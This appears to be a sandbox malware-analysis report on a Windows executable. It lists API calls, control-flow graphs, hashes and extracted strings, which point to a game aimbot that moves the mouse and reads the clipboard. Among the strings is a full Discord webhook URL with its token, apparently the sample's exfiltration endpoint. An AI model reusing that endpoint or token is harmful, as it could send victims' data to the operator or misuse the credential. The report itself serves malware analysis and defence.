                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179082
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741790C7
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417910C
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179151
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179196
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741791DB
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179220
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179265
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741792AA
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741792EF
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179334
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179379
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741793BE
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179403
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179448
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417948D
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741794D2
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179517
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417955C
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741795A1
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741795E6
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417962B
                                                                                                                                                                            • Part of subcall function 00007FF6741897B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF674189808
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179670
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741796B5
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741796FA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_taskExceptionThrow
                                                                                                                                                                          • String ID: exists$https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
                                                                                                                                                                          • API String ID: 2708383850-3501797402
                                                                                                                                                                          • Opcode ID: 74baa2162864e6956a34f70519118e6c3a6bce27ea85730787bdfad066606682
                                                                                                                                                                          • Instruction ID: 875f369685a97edffbbf0f29c0f8c02b1e0326221043227b546035b9413160b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 74baa2162864e6956a34f70519118e6c3a6bce27ea85730787bdfad066606682
                                                                                                                                                                          • Instruction Fuzzy Hash: D623A653E79BCAD4FB21EB34C8857F91311AB96398F105321E65C95AA6EF6CB6C4C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memchr$ControlDevice$_invalid_parameter_noinfo_noreturnsqrt$AsyncInputSendState
                                                                                                                                                                          • String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
                                                                                                                                                                          • API String ID: 175615221-766504981
                                                                                                                                                                          • Opcode ID: 1caa445faf76c763df1c070efffc9ed14ff11df3b4b25bc150dd399170ce5fdc
                                                                                                                                                                          • Instruction ID: 649cfc0150304ea0d06f8afc5ddcd35155d5b5a9d75c6b037a18755be1f23609
                                                                                                                                                                          • Opcode Fuzzy Hash: 1caa445faf76c763df1c070efffc9ed14ff11df3b4b25bc150dd399170ce5fdc
                                                                                                                                                                          • Instruction Fuzzy Hash: 65A2A723E2CB86C5EA12EB35D4883B463A0AF557A4F148732D96DA77E5DF7CB5818300

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1854 7ff67418dadc-7ff67418db1c 1855 7ff67418db1e-7ff67418db25 1854->1855 1856 7ff67418db31-7ff67418db3a 1854->1856 1855->1856 1857 7ff67418db27-7ff67418db2c 1855->1857 1858 7ff67418db56-7ff67418db58 1856->1858 1859 7ff67418db3c-7ff67418db3f 1856->1859 1860 7ff67418ddba-7ff67418dde0 call 7ff67418c910 1857->1860 1862 7ff67418db5e-7ff67418db62 1858->1862 1863 7ff67418ddb8 1858->1863 1859->1858 1861 7ff67418db41-7ff67418db49 1859->1861 1867 7ff67418db4f-7ff67418db52 1861->1867 1868 7ff67418db4b-7ff67418db4d 1861->1868 1864 7ff67418db68-7ff67418db6b 1862->1864 1865 7ff67418dc39-7ff67418dc60 call 7ff67418de04 1862->1865 1863->1860 1869 7ff67418db7f-7ff67418db91 GetFileAttributesExW 1864->1869 1870 7ff67418db6d-7ff67418db75 1864->1870 1879 7ff67418dc82-7ff67418dc8b 1865->1879 1880 7ff67418dc62-7ff67418dc6b 1865->1880 1867->1858 1868->1858 1868->1867 1874 7ff67418db93-7ff67418db9c GetLastError 1869->1874 1875 7ff67418dbe4-7ff67418dbf3 1869->1875 1870->1869 1873 7ff67418db77-7ff67418db79 1870->1873 1873->1865 1873->1869 1874->1860 1877 7ff67418dba2-7ff67418dbb4 FindFirstFileW 1874->1877 1878 7ff67418dbf7-7ff67418dbf9 1875->1878 1885 7ff67418dbc1-7ff67418dbe2 FindClose 1877->1885 1886 7ff67418dbb6-7ff67418dbbc GetLastError 1877->1886 1887 7ff67418dc05-7ff67418dc33 1878->1887 1888 7ff67418dbfb-7ff67418dc03 1878->1888 1883 7ff67418dc91-7ff67418dca9 GetFileInformationByHandleEx 1879->1883 1884 7ff67418dd43-7ff67418dd4c 1879->1884 1881 7ff67418dc7b-7ff67418dc7d 1880->1881 1882 7ff67418dc6d-7ff67418dc75 CloseHandle 1880->1882 1881->1860 1882->1881 1889 7ff67418ddf4-7ff67418ddfa abort 1882->1889 1892 7ff67418dcd4-7ff67418dced 1883->1892 1893 7ff67418dcab-7ff67418dcb7 GetLastError 1883->1893 1890 7ff67418dd4e-7ff67418dd62 GetFileInformationByHandleEx 1884->1890 1891 7ff67418dda1-7ff67418dda3 1884->1891 1885->1878 1886->1860 1887->1863 1887->1865 1888->1865 1888->1887 1894 7ff67418ddfb-7ff67418de00 1889->1894 1895 7ff67418dd8e-7ff67418dd9e 1890->1895 1896 7ff67418dd64-7ff67418dd70 GetLastError 1890->1896 1899 7ff67418dde1-7ff67418dde5 1891->1899 1900 7ff67418dda5-7ff67418dda9 1891->1900 1892->1884 1901 7ff67418dcef-7ff67418dcf3 1892->1901 1897 7ff67418dcb9-7ff67418dcc4 CloseHandle 1893->1897 1898 7ff67418dccd-7ff67418dccf 1893->1898 1894->1860 1895->1891 1896->1898 1902 7ff67418dd76-7ff67418dd81 CloseHandle 1896->1902 1897->1898 1903 7ff67418dcc6-7ff67418dccc abort 1897->1903 1898->1860 1899->1894 1907 7ff67418dde7-7ff67418ddf2 CloseHandle 1899->1907 1900->1863 1904 7ff67418ddab-7ff67418ddb6 CloseHandle 1900->1904 1905 7ff67418dcf5-7ff67418dd0f GetFileInformationByHandleEx 1901->1905 1906 7ff67418dd3c 1901->1906 1902->1898 1909 7ff67418dd87-7ff67418dd8d abort 1902->1909 1903->1898 1904->1863 1904->1889 1910 7ff67418dd11-7ff67418dd1d GetLastError 1905->1910 1911 7ff67418dd33-7ff67418dd3a 1905->1911 1908 7ff67418dd40 1906->1908 1907->1889 1907->1894 1908->1884 1909->1895 1910->1898 1912 7ff67418dd1f-7ff67418dd2a CloseHandle 1910->1912 1911->1908 1912->1898 1913 7ff67418dd2c-7ff67418dd32 abort 1912->1913 1913->1911
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4293554670-0
                                                                                                                                                                          • Opcode ID: a9d238aedac359b228b14c991d560575364a6824095be2b364f9a602f4a28b3a
                                                                                                                                                                          • Instruction ID: 356a007d055aa44cf2255d77e201a1af92281c96308a850af5017ec8016a7fe1
                                                                                                                                                                          • Opcode Fuzzy Hash: a9d238aedac359b228b14c991d560575364a6824095be2b364f9a602f4a28b3a
                                                                                                                                                                          • Instruction Fuzzy Hash: 0791A233B28B42C6E664AB25A88867927A4AF957B4F084334D9BEC77D4DF3CE401C700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1914 7ff67417ecc0-7ff67417ed40 1915 7ff67417efcd-7ff67417f018 call 7ff67418a030 1914->1915 1916 7ff67417ed46-7ff67417ed59 call 7ff67418c9d8 1914->1916 1921 7ff67417f01a-7ff67417f01d 1915->1921 1922 7ff67417f051-7ff67417f062 1915->1922 1916->1915 1923 7ff67417ed5f-7ff67417ef04 call 7ff67417e8b0 * 10 1916->1923 1921->1922 1924 7ff67417f01f-7ff67417f023 1921->1924 1925 7ff67417f068 1922->1925 1926 7ff67417f2c5-7ff67417f2c9 1922->1926 2000 7ff67417ef09 call 7ff67418cf54 1923->2000 1924->1922 1928 7ff67417f025-7ff67417f02f 1924->1928 1931 7ff67417f070-7ff67417f07c 1925->1931 1929 7ff67417f2cb-7ff67417f2e0 1926->1929 1930 7ff67417f303-7ff67417f346 call 7ff67418c910 1926->1930 1928->1922 1933 7ff67417f031-7ff67417f04a call 7ff674171b70 1928->1933 1934 7ff67417f2e2-7ff67417f2f5 1929->1934 1935 7ff67417f2fe call 7ff67418cd60 1929->1935 1937 7ff67417f081-7ff67417f0a5 call 7ff67418b1a0 1931->1937 1938 7ff67417f07e 1931->1938 1933->1922 1934->1935 1942 7ff67417f2f7-7ff67417f2fd _invalid_parameter_noinfo_noreturn 1934->1942 1935->1930 1950 7ff67417f0a7-7ff67417f0ae 1937->1950 1951 7ff67417f0b5-7ff67417f0c7 call 7ff67418a030 1937->1951 1938->1937 1942->1935 1950->1931 1954 7ff67417f0b0 1950->1954 1957 7ff67417f0cd-7ff67417f0f8 1951->1957 1958 7ff67417f2be 1951->1958 1954->1926 1960 7ff67417f0fa-7ff67417f0fd 1957->1960 1961 7ff67417f12f 1957->1961 1958->1926 1960->1961 1963 7ff67417f0ff-7ff67417f10d 1960->1963 1965 7ff67417f139-7ff67417f156 1961->1965 1963->1965 1966 7ff67417f10f-7ff67417f119 1963->1966 1968 7ff67417f18a-7ff67417f1e9 pow * 3 1965->1968 1969 7ff67417f158-7ff67417f15b 1965->1969 1966->1965 1972 7ff67417f11b-7ff67417f12d call 7ff674171b70 1966->1972 1970 7ff67417f1eb-7ff67417f1f2 1968->1970 1971 7ff67417f1f4-7ff67417f1f7 sqrt 1968->1971 1969->1968 1974 7ff67417f15d-7ff67417f161 1969->1974 1975 7ff67417f1fc-7ff67417f212 1970->1975 1971->1975 1972->1965 1974->1968 1978 7ff67417f163-7ff67417f16d 1974->1978 1979 7ff67417f214-7ff67417f227 call 7ff67418c9d8 1975->1979 1980 7ff67417f241-7ff67417f26e call 7ff674172230 1975->1980 1978->1968 1983 7ff67417f16f-7ff67417f181 call 7ff674171b70 1978->1983 1979->1980 1993 7ff67417f229-7ff67417f23c call 7ff674172230 call 7ff67418c96c 1979->1993 1980->1958 1992 7ff67417f270-7ff67417f283 1980->1992 1983->1968 1992->1958 1995 7ff67417f285-7ff67417f2b7 mouse_event * 2 1992->1995 1993->1980 1995->1958 2002 7ff67417ef0e-7ff67417ef5d 2000->2002 2003 7ff67417ef60-7ff67417ef84 call 7ff67417eaf0 2002->2003 2006 7ff67417ef86-7ff67417efc8 call 7ff67417ec20 call 7ff67418ca50 call 7ff67418cd48 call 7ff67418c96c 2003->2006 2006->1915
                                                                                                                                                                          APIs
                                                                                                                                                                          • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1A5
                                                                                                                                                                          • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1C0
                                                                                                                                                                          • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1D9
                                                                                                                                                                          • sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67417F1F7
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417F2F7
                                                                                                                                                                            • Part of subcall function 00007FF67418C9D8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF674152AC0), ref: 00007FF67418C9E8
                                                                                                                                                                          • mouse_event.USER32 ref: 00007FF67417F299
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965
                                                                                                                                                                            • Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E
                                                                                                                                                                          • mouse_event.USER32 ref: 00007FF67417F2B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
                                                                                                                                                                          • String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
                                                                                                                                                                          • API String ID: 2172613484-4283324268
                                                                                                                                                                          • Opcode ID: 2eb0c79e253c57d9920e8173fe96c0999fa43dce57571fed94bcb779acbfa6ea
                                                                                                                                                                          • Instruction ID: 299e6972fe772f45ea7843c0dc3952133a4d4d9ee4b77010b45cebbddd891c6a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2eb0c79e253c57d9920e8173fe96c0999fa43dce57571fed94bcb779acbfa6ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 4102A423E38B86C5E711EB35D8853F96361BF953A4F549332EA5C92695EF7CA580C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$malloc$memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1620901979-0
                                                                                                                                                                          • Opcode ID: 72a844f201c5ad39abbf54e49f5249660775106968ed64801e1735698d8315b2
                                                                                                                                                                          • Instruction ID: 3a4a60065756a6830fc3041f93a5d79a015d54bdaa6f7766f198cf042c4036f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 72a844f201c5ad39abbf54e49f5249660775106968ed64801e1735698d8315b2
                                                                                                                                                                          • Instruction Fuzzy Hash: E9B2BF73A14B84CAE755DF26D0886BD7BA4FB49B88F058236DE4993754EF38E491CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$mallocmemcpysqrtf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 943526449-0
                                                                                                                                                                          • Opcode ID: ed73fb9772e8421709a7575f4193eaeaf6b0d4d4a450a63e0219d27f64c9c0df
                                                                                                                                                                          • Instruction ID: d14e9baa40b0c80a1a91ca4ffa073f94979fc23c8182915a27c449eac70b40ac
                                                                                                                                                                          • Opcode Fuzzy Hash: ed73fb9772e8421709a7575f4193eaeaf6b0d4d4a450a63e0219d27f64c9c0df
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B726F13E28BD885D312973650822B9B7D1AF6E784F19D722FD49E6662DF3CE491C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: cosfsinf$ControlDevice$asinatan2memsettanf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1330759842-0
                                                                                                                                                                          • Opcode ID: 699a7025857ea82c0c18217e7892348d3648a1f27a8ae830b2d2f4ab04345e4a
                                                                                                                                                                          • Instruction ID: 84509ec5a879c59b92e75fa7f8b291980a972b6007f84890b0e17304098364ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 699a7025857ea82c0c18217e7892348d3648a1f27a8ae830b2d2f4ab04345e4a
                                                                                                                                                                          • Instruction Fuzzy Hash: 87D19923D38F8585E213EB3994852B5A364AF6F3D4F15D332F94D71662EF29A1D28A00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2057792927-0
                                                                                                                                                                          • Opcode ID: 2e3ab516b8ba894ed820c2d0740575cdb0534405dfac8718f71a9eab1fc27e0b
                                                                                                                                                                          • Instruction ID: 67ba689c5689930941d82855fc2938406ad1da30390e00a40e8935420ae3d146
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e3ab516b8ba894ed820c2d0740575cdb0534405dfac8718f71a9eab1fc27e0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 30516A67B28A42C2FA54AB19E8D82B963A0AF84B90F544575D90EC77A1DF3CF581CB40
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
